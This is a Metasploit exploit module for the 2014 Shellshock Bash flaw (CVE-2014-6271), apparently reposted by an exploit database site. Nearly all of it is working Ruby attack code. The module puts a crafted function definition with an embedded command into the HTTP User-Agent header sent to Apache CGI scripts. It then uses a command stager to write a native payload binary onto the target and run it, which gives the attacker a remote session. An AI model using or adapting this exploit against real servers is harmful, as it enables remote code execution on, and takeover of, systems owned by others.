###########################

# Apache mod_cgi Bash Environment Variable Code Injection

###########################

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection',
'Description' => %q{
This module exploits a code injection in specially crafted environment
variables in Bash, specifically targeting Apache mod_cgi scripts through
the HTTP_USER_AGENT variable.
},
'Author' => [
'Stephane Chazelas', # Vulnerability discovery
'wvu', # Original Metasploit aux module
'juan vazquez' # Allow wvu's module to get native sessions
],
'References' => [
['CVE', '2014-6271'],
['URL', 'https://access.redhat.com/articles/1200223'],
['URL', 'http://seclists.org/oss-sec/2014/q3/649']
],
'Payload' =>
{
'DisableNops' => true,
'Space' => 2048
},
'Targets' =>
[
[ 'Linux x86',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => [ :echo, :printf ]
}
],
[ 'Linux x86_64',
{
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => [ :echo, :printf ]
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 24 2014',
'License' => MSF_LICENSE
))

register_options([
OptString.new('TARGETURI', [true, 'Path to CGI script']),
OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),
OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
], self.class)
end

def check
res = req("echo #{marker}")

if res && res.body.include?(marker * 3)
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end

def exploit
# Cannot use generic/shell_reverse_tcp inside an elf
# Checking before proceeds
if generate_payload_exe.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native
payload")
end

execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], :nodelete => true)

# A last chance after the cmdstager
# Trying to make it generic
unless session_created?

req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@v
ar_elf")}")
end
end

def execute_command(cmd, opts)
cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")

req(cmd)
end

def req(cmd)
send_request_cgi(
{
'method' => datastore['METHOD'],
'uri' => normalize_uri(target_uri.path.to_s),
'agent' => "() { :;};echo #{marker}$(#{cmd})#{marker}"
}, datastore['TIMEOUT'])
end

def marker
@marker ||= rand_text_alphanumeric(rand(42) + 1)
end
end

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2014-09-30]

###########################